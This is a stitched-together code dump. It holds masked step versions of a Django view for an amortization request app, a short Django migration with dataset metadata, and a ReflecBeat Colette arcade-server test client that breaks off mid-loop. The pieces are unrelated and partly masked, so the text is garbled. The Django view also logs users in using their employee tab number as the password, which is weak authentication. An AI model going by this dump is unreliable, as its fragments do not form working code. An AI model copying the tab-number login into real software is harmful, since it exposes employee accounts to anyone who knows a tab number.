"step-1": "<mask token>\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n uid.tab_number)\n if user:\n login(request, user)\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-2": "<mask token>\n\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n return locals()\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n uid.tab_number)\n if user:\n login(request, user)\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-3": "<mask token>\n__author__ = 'cm'\n<mask token>\n\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n return locals()\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n uid.tab_number)\n if user:\n login(request, user)\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-4": "from django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.middleware.csrf import get_token\nfrom django.template.context import Context\nfrom django.utils.translation import ugettext_lazy as _\nfrom account.models import Employee\nfrom amortization import settings\nfrom models import MenuItem\nfrom task.forms import RequestForm\nfrom task.models import Request, Task\n__author__ = 'cm'\nfrom django.template.loader import get_template\n\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n return locals()\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n uid.tab_number)\n if user:\n login(request, user)\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.middleware.csrf import get_token\nfrom django.template.context import Context\nfrom django.utils.translation import ugettext_lazy as _\nfrom account.models import Employee\nfrom amortization import settings\nfrom models import MenuItem\nfrom task.forms import RequestForm\nfrom task.models import Request, Task\n\n__author__ = 'cm'\n\nfrom django.template.loader import get_template\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n\n return locals()\n\ndef main(request):\n c = base_context(request)\n template = get_template(\"index.html\")\n c['title'] = _('Request')\n form = RequestForm()\n\n # if user is authenticated\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl.tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n\n c['form'] = form\n\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number = postdata.get('tab_number', 0))\n if not empl:\n # django user ---\n if user.is_authenticated():\n # logout\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n\n # login\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n\n # amortization user\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', \"error!\")\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=uid.tab_number)\n if user:\n login(request, user)\n\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n\n else:\n c['form'] = form\n\n return HttpResponse(template.render(Context(c)))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-04-11 03:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('produksi', '0055_auto_20190409_1316'),
]
operations = [
migrations.RemoveField(
model_name='transisi',
name='status_perpindahan',
),
]
|
normal
|
{
"blob_id": "1eb5df463bbd39002c5dbc3f88459e2f26d4b465",
"index": 8505,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('produksi', '0055_auto_20190409_1316')]\n operations = [migrations.RemoveField(model_name='transisi', name=\n 'status_perpindahan')]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('produksi', '0055_auto_20190409_1316')]\n operations = [migrations.RemoveField(model_name='transisi', name=\n 'status_perpindahan')]\n",
"step-5": "# -*- coding: utf-8 -*-\r\n# Generated by Django 1.11.20 on 2019-04-11 03:58\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('produksi', '0055_auto_20190409_1316'),\r\n ]\r\n\r\n operations = [\r\n migrations.RemoveField(\r\n model_name='transisi',\r\n name='status_perpindahan',\r\n ),\r\n ]\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import random
import time
from typing import Dict, List, Optional
from bemani.client.base import BaseClient
from bemani.protocol import Node
class ReflecBeatColette(BaseClient):
NAME = 'TEST'
def verify_pcb_boot(self, loc: str) -> None:
call = self.call_node()
pcb = Node.void('pcb')
pcb.set_attribute('method', 'boot')
pcb.add_child(Node.string('lid', loc))
call.add_child(pcb)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/pcb/sinfo/nm")
self.assert_path(resp, "response/pcb/sinfo/cl_enbl")
self.assert_path(resp, "response/pcb/sinfo/cl_h")
self.assert_path(resp, "response/pcb/sinfo/cl_m")
def verify_info_common(self) -> None:
call = self.call_node()
info = Node.void('info')
info.set_attribute('method', 'common')
call.add_child(info)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/info/event_ctrl")
self.assert_path(resp, "response/info/item_lock_ctrl")
def verify_info_ranking(self) -> None:
call = self.call_node()
info = Node.void('info')
info.set_attribute('method', 'ranking')
info.add_child(Node.s32('ver', 0))
call.add_child(info)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/info/ver")
self.assert_path(resp, "response/info/ranking/weekly/bt")
self.assert_path(resp, "response/info/ranking/weekly/et")
self.assert_path(resp, "response/info/ranking/weekly/new/d/mid")
self.assert_path(resp, "response/info/ranking/weekly/new/d/cnt")
self.assert_path(resp, "response/info/ranking/monthly/bt")
self.assert_path(resp, "response/info/ranking/monthly/et")
self.assert_path(resp, "response/info/ranking/monthly/new/d/mid")
self.assert_path(resp, "response/info/ranking/monthly/new/d/cnt")
self.assert_path(resp, "response/info/ranking/total/bt")
self.assert_path(resp, "response/info/ranking/total/et")
self.assert_path(resp, "response/info/ranking/total/new/d/mid")
self.assert_path(resp, "response/info/ranking/total/new/d/cnt")
def verify_player_start(self, refid: str) -> None:
call = self.call_node()
player = Node.void('player')
player.set_attribute('method', 'start')
player.add_child(Node.string('rid', refid))
player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))
player.add_child(Node.u16('gp', 10573))
player.add_child(Node.u8_array('la', [16, 0, 0, 0]))
call.add_child(player)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/player/plyid")
self.assert_path(resp, "response/player/start_time")
self.assert_path(resp, "response/player/event_ctrl")
self.assert_path(resp, "response/player/item_lock_ctrl")
self.assert_path(resp, "response/player/lincle_link_4")
self.assert_path(resp, "response/player/jbrbcollabo")
self.assert_path(resp, "response/player/tricolettepark")
def verify_player_delete(self, refid: str) -> None:
call = self.call_node()
player = Node.void('player')
player.set_attribute('method', 'delete')
player.add_child(Node.string('rid', refid))
call.add_child(player)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/player")
def verify_player_end(self, refid: str) -> None:
call = self.call_node()
player = Node.void('player')
player.set_attribute('method', 'end')
player.add_child(Node.string('rid', refid))
call.add_child(player)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/player")
def verify_player_succeed(self, refid: str) -> None:
call = self.call_node()
player = Node.void('player')
player.set_attribute('method', 'succeed')
player.add_child(Node.string('rid', refid))
call.add_child(player)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/player/name")
self.assert_path(resp, "response/player/lv")
self.assert_path(resp, "response/player/exp")
self.assert_path(resp, "response/player/grd")
self.assert_path(resp, "response/player/ap")
self.assert_path(resp, "response/player/released")
self.assert_path(resp, "response/player/mrecord")
def verify_player_read(self, refid: str, location: str) -> List[Dict[str, int]]:
call = self.call_node()
player = Node.void('player')
player.set_attribute('method', 'read')
player.add_child(Node.string('rid', refid))
player.add_child(Node.string('lid', location))
player.add_child(Node.s16('ver', 5))
call.add_child(player)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/player/pdata/account/usrid")
self.assert_path(resp, "response/player/pdata/account/tpc")
self.assert_path(resp, "response/player/pdata/account/dpc")
self.assert_path(resp, "response/player/pdata/account/crd")
self.assert_path(resp, "response/player/pdata/account/brd")
self.assert_path(resp, "response/player/pdata/account/tdc")
self.assert_path(resp, "response/player/pdata/account/intrvld")
self.assert_path(resp, "response/player/pdata/account/ver")
self.assert_path(resp, "response/player/pdata/account/pst")
self.assert_path(resp, "response/player/pdata/account/st")
self.assert_path(resp, "response/player/pdata/base/name")
self.assert_path(resp, "response/player/pdata/base/exp")
self.assert_path(resp, "response/player/pdata/base/lv")
self.assert_path(resp, "response/player/pdata/base/mg")
self.assert_path(resp, "response/player/pdata/base/ap")
self.assert_path(resp, "response/player/pdata/base/tid")
self.assert_path(resp, "response/player/pdata/base/tname")
self.assert_path(resp, "response/player/pdata/base/cmnt")
self.assert_path(resp, "response/player/pdata/base/uattr")
self.assert_path(resp, "response/player/pdata/base/hidden_param")
self.assert_path(resp, "response/player/pdata/base/tbs")
self.assert_path(resp, "response/player/pdata/base/tbs_r")
self.assert_path(resp, "response/player/pdata/rival")
self.assert_path(resp, "response/player/pdata/fav_music_slot")
self.assert_path(resp, "response/player/pdata/custom")
self.assert_path(resp, "response/player/pdata/config")
self.assert_path(resp, "response/player/pdata/stamp")
self.assert_path(resp, "response/player/pdata/released")
self.assert_path(resp, "response/player/pdata/record")
if resp.child_value('player/pdata/base/name') != self.NAME:
raise Exception('Invalid name {} returned on profile read!'.format(resp.child_value('player/pdata/base/name')))
scores = []
for child in resp.child('player/pdata/record').children:
if child.name != 'rec':
continue
score = {
'id': child.child_value('mid'),
'chart': child.child_value('ntgrd'),
'clear_type': child.child_value('ct'),
'achievement_rate': child.child_value('ar'),
'score': child.child_value('scr'),
'combo': child.child_value('cmb'),
'miss_count': child.child_value('ms'),
}
scores.append(score)
return scores
def verify_player_write(self, refid: str, loc: str, scores: List[Dict[str, int]]) -> int:
call = self.call_node()
player = Node.void('player')
call.add_child(player)
player.set_attribute('method', 'write')
pdata = Node.void('pdata')
player.add_child(pdata)
account = Node.void('account')
pdata.add_child(account)
account.add_child(Node.s32('usrid', 0))
account.add_child(Node.s32('plyid', 0))
account.add_child(Node.s32('tpc', 1))
account.add_child(Node.s32('dpc', 1))
account.add_child(Node.s32('crd', 1))
account.add_child(Node.s32('brd', 1))
account.add_child(Node.s32('tdc', 1))
account.add_child(Node.string('rid', refid))
account.add_child(Node.string('lid', loc))
account.add_child(Node.u8('mode', 0))
account.add_child(Node.s16('ver', 5))
account.add_child(Node.bool('pp', True))
account.add_child(Node.bool('ps', True))
account.add_child(Node.s16('pay', 0))
account.add_child(Node.s16('pay_pc', 0))
account.add_child(Node.u64('st', int(time.time() * 1000)))
base = Node.void('base')
pdata.add_child(base)
base.add_child(Node.string('name', self.NAME))
base.add_child(Node.s32('exp', 0))
base.add_child(Node.s32('lv', 1))
base.add_child(Node.s32('mg', -1))
base.add_child(Node.s32('ap', -1))
base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))
base.add_child(Node.bool('is_tut', True))
stglog = Node.void('stglog')
pdata.add_child(stglog)
index = 0
for score in scores:
log = Node.void('log')
stglog.add_child(log)
log.add_child(Node.s8('stg', index))
log.add_child(Node.s16('mid', score['id']))
log.add_child(Node.s8('ng', score['chart']))
log.add_child(Node.s8('col', 0))
log.add_child(Node.s8('mt', 7))
log.add_child(Node.s8('rt', 0))
log.add_child(Node.s8('ct', score['clear_type']))
log.add_child(Node.s16('grd', 0))
log.add_child(Node.s16('ar', score['achievement_rate']))
log.add_child(Node.s16('sc', score['score']))
log.add_child(Node.s16('jt_jst', 0))
log.add_child(Node.s16('jt_grt', 0))
log.add_child(Node.s16('jt_gd', 0))
log.add_child(Node.s16('jt_ms', score['miss_count']))
log.add_child(Node.s16('jt_jr', 0))
log.add_child(Node.s16('cmb', score['combo']))
log.add_child(Node.s16('exp', 0))
log.add_child(Node.s32('r_uid', 0))
log.add_child(Node.s32('r_plyid', 0))
log.add_child(Node.s8('r_stg', 0))
log.add_child(Node.s8('r_ct', -1))
log.add_child(Node.s16('r_sc', 0))
log.add_child(Node.s16('r_grd', 0))
log.add_child(Node.s16('r_ar', 0))
log.add_child(Node.s8('r_cpuid', -1))
log.add_child(Node.s32('time', int(time.time())))
log.add_child(Node.s8('decide', 0))
index = index + 1
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/player/uid")
return resp.child_value('player/uid')
def verify_lobby_read(self, location: str, extid: int) -> None:
call = self.call_node()
lobby = Node.void('lobby')
lobby.set_attribute('method', 'read')
lobby.add_child(Node.s32('uid', extid))
lobby.add_child(Node.u8('m_grade', 255))
lobby.add_child(Node.string('lid', location))
lobby.add_child(Node.s32('max', 128))
lobby.add_child(Node.s32_array('friend', []))
lobby.add_child(Node.u8('var', 5))
call.add_child(lobby)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/lobby/interval")
self.assert_path(resp, "response/lobby/interval_p")
def verify_lobby_entry(self, location: str, extid: int) -> int:
call = self.call_node()
lobby = Node.void('lobby')
lobby.set_attribute('method', 'entry')
e = Node.void('e')
lobby.add_child(e)
e.add_child(Node.s32('eid', 0))
e.add_child(Node.u16('mid', 79))
e.add_child(Node.u8('ng', 0))
e.add_child(Node.s32('uid', extid))
e.add_child(Node.s32('uattr', 0))
e.add_child(Node.string('pn', self.NAME))
e.add_child(Node.s16('mg', 255))
e.add_child(Node.s32('mopt', 0))
e.add_child(Node.s32('tid', 0))
e.add_child(Node.string('tn', ''))
e.add_child(Node.s32('topt', 0))
e.add_child(Node.string('lid', location))
e.add_child(Node.string('sn', ''))
e.add_child(Node.u8('pref', 51))
e.add_child(Node.s8('stg', 4))
e.add_child(Node.s8('pside', 0))
e.add_child(Node.s16('eatime', 30))
e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))
e.add_child(Node.u16('gp', 10007))
e.add_child(Node.u8_array('la', [16, 0, 0, 0]))
e.add_child(Node.u8('ver', 5))
lobby.add_child(Node.s32_array('friend', []))
call.add_child(lobby)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/lobby/interval")
self.assert_path(resp, "response/lobby/interval_p")
self.assert_path(resp, "response/lobby/eid")
self.assert_path(resp, "response/lobby/e/eid")
self.assert_path(resp, "response/lobby/e/mid")
self.assert_path(resp, "response/lobby/e/ng")
self.assert_path(resp, "response/lobby/e/uid")
self.assert_path(resp, "response/lobby/e/uattr")
self.assert_path(resp, "response/lobby/e/pn")
self.assert_path(resp, "response/lobby/e/mg")
self.assert_path(resp, "response/lobby/e/mopt")
self.assert_path(resp, "response/lobby/e/tid")
self.assert_path(resp, "response/lobby/e/tn")
self.assert_path(resp, "response/lobby/e/topt")
self.assert_path(resp, "response/lobby/e/lid")
self.assert_path(resp, "response/lobby/e/sn")
self.assert_path(resp, "response/lobby/e/pref")
self.assert_path(resp, "response/lobby/e/stg")
self.assert_path(resp, "response/lobby/e/pside")
self.assert_path(resp, "response/lobby/e/eatime")
self.assert_path(resp, "response/lobby/e/ga")
self.assert_path(resp, "response/lobby/e/gp")
self.assert_path(resp, "response/lobby/e/la")
self.assert_path(resp, "response/lobby/e/ver")
return resp.child_value('lobby/eid')
def verify_lobby_delete(self, eid: int) -> None:
call = self.call_node()
lobby = Node.void('lobby')
lobby.set_attribute('method', 'delete')
lobby.add_child(Node.s32('eid', eid))
call.add_child(lobby)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/lobby")
def verify_pzlcmt_read(self, extid: int) -> None:
call = self.call_node()
info = Node.void('info')
info.set_attribute('method', 'pzlcmt_read')
info.add_child(Node.s32('uid', extid))
info.add_child(Node.s32('tid', 0))
info.add_child(Node.s32('time', 0))
info.add_child(Node.s32('limit', 30))
call.add_child(info)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/info/comment/time")
self.assert_path(resp, "response/info/c/uid")
self.assert_path(resp, "response/info/c/name")
self.assert_path(resp, "response/info/c/icon")
self.assert_path(resp, "response/info/c/bln")
self.assert_path(resp, "response/info/c/tid")
self.assert_path(resp, "response/info/c/t_name")
self.assert_path(resp, "response/info/c/pref")
self.assert_path(resp, "response/info/c/time")
self.assert_path(resp, "response/info/c/comment")
self.assert_path(resp, "response/info/c/is_tweet")
# Verify we posted our comment earlier
found = False
for child in resp.child('info').children:
if child.name != 'c':
continue
if child.child_value('uid') == extid:
name = child.child_value('name')
comment = child.child_value('comment')
if name != self.NAME:
raise Exception('Invalid name \'{}\' returned for comment!'.format(name))
if comment != 'アメ〜〜!':
raise Exception('Invalid comment \'{}\' returned for comment!'.format(comment))
found = True
if not found:
raise Exception('Comment we posted was not found!')
def verify_pzlcmt_write(self, extid: int) -> None:
call = self.call_node()
info = Node.void('info')
info.set_attribute('method', 'pzlcmt_write')
info.add_child(Node.s32('uid', extid))
info.add_child(Node.string('name', self.NAME))
info.add_child(Node.s16('icon', 0))
info.add_child(Node.s8('bln', 0))
info.add_child(Node.s32('tid', 0))
info.add_child(Node.string('t_name', ''))
info.add_child(Node.s8('pref', 51))
info.add_child(Node.s32('time', int(time.time())))
info.add_child(Node.string('comment', 'アメ〜〜!'))
info.add_child(Node.bool('is_tweet', True))
call.add_child(info)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/info")
def verify_jbrbcollabo_save(self, refid: str) -> None:
call = self.call_node()
jbrbcollabo = Node.void('jbrbcollabo')
jbrbcollabo.set_attribute('method', 'save')
jbrbcollabo.add_child(Node.string('ref_id', refid))
jbrbcollabo.add_child(Node.u16('cre_count', 0))
call.add_child(jbrbcollabo)
# Swap with server
resp = self.exchange('', call)
# Verify that response is correct
self.assert_path(resp, "response/jbrbcollabo")
def verify(self, cardid: Optional[str]) -> None:
# Verify boot sequence is okay
self.verify_services_get(
expected_services=[
'pcbtracker',
'pcbevent',
'local',
'message',
'facility',
'cardmng',
'package',
'posevent',
'pkglist',
'dlstatus',
'eacoin',
'lobby',
'ntp',
'keepalive'
]
)
paseli_enabled = self.verify_pcbtracker_alive()
self.verify_message_get()
self.verify_package_list()
location = self.verify_facility_get()
self.verify_pcbevent_put()
self.verify_pcb_boot(location)
self.verify_info_common()
# Verify card registration and profile lookup
if cardid is not None:
card = cardid
else:
card = self.random_card()
print("Generated random card ID {} for use.".format(card))
if cardid is None:
self.verify_cardmng_inquire(card, msg_type='unregistered', paseli_enabled=paseli_enabled)
ref_id = self.verify_cardmng_getrefid(card)
if len(ref_id) != 16:
raise Exception('Invalid refid \'{}\' returned when registering card'.format(ref_id))
if ref_id != self.verify_cardmng_inquire(card, msg_type='new', paseli_enabled=paseli_enabled):
raise Exception('Invalid refid \'{}\' returned when querying card'.format(ref_id))
# Always get a player start, regardless of new profile or not
self.verify_player_start(ref_id)
self.verify_player_delete(ref_id)
self.verify_player_succeed(ref_id)
extid = self.verify_player_write(
ref_id,
location,
[{
'id': 0,
'chart': 0,
'clear_type': -1,
'achievement_rate': 0,
'score': 0,
'combo': 0,
'miss_count': 0,
}]
)
else:
print("Skipping new card checks for existing card")
ref_id = self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled)
# Verify pin handling and return card handling
self.verify_cardmng_authpass(ref_id, correct=True)
self.verify_cardmng_authpass(ref_id, correct=False)
if ref_id != self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled):
raise Exception('Invalid refid \'{}\' returned when querying card'.format(ref_id))
# Verify lobby functionality
self.verify_lobby_read(location, extid)
eid = self.verify_lobby_entry(location, extid)
self.verify_lobby_delete(eid)
# Verify puzzle comment read and write
self.verify_pzlcmt_write(extid)
self.verify_pzlcmt_read(extid)
# Verify Jubeat/ReflecBeat collabo save
self.verify_jbrbcollabo_save(ref_id)
if cardid is None:
# Verify score saving and updating
for phase in [1, 2]:
if phase == 1:
dummyscores = [
# An okay score on a chart
{
'id': 1,
'chart': 1,
'clear_type': 2,
'achievement_rate': 7543,
'score': 432,
'combo': 123,
'miss_count': 5,
},
# A good score on an easier chart of the same song
{
'id': 1,
'chart': 0,
'clear_type': 4,
'achievement_rate': 9876,
'score': 543,
'combo': 543,
'miss_count': 0,
},
# A bad score on a hard chart
{
'id': 3,
'chart': 2,
'clear_type': 2,
'achievement_rate': 1234,
'score': 123,
'combo': 42,
'miss_count': 54,
},
# A terrible score on an easy chart
{
'id': 3,
'chart': 0,
'clear_type': 2,
'achievement_rate': 1024,
'score': 50,
'combo': 12,
'miss_count': 90,
},
]
if phase == 2:
dummyscores = [
# A better score on the same chart
{
'id': 1,
'chart': 1,
'clear_type': 3,
'achievement_rate': 8765,
'score': 469,
'combo': 468,
'miss_count': 1,
},
# A worse score on another same chart
{
'id': 1,
'chart': 0,
'clear_type': 2,
'achievement_rate': 8765,
'score': 432,
'combo': 321,
'miss_count': 15,
'expected_score': 543,
'expected_clear_type': 4,
'expected_achievement_rate': 9876,
'expected_combo': 543,
'expected_miss_count': 0,
},
]
self.verify_player_write(ref_id, location, dummyscores)
scores = self.verify_player_read(ref_id, location)
for expected in dummyscores:
actual = None
for received in scores:
if received['id'] == expected['id'] and received['chart'] == expected['chart']:
actual = received
break
if actual is None:
raise Exception("Didn't find song {} chart {} in response!".format(expected['id'], expected['chart']))
if 'expected_score' in expected:
expected_score = expected['expected_score']
else:
expected_score = expected['score']
if 'expected_achievement_rate' in expected:
expected_achievement_rate = expected['expected_achievement_rate']
else:
expected_achievement_rate = expected['achievement_rate']
if 'expected_clear_type' in expected:
expected_clear_type = expected['expected_clear_type']
else:
expected_clear_type = expected['clear_type']
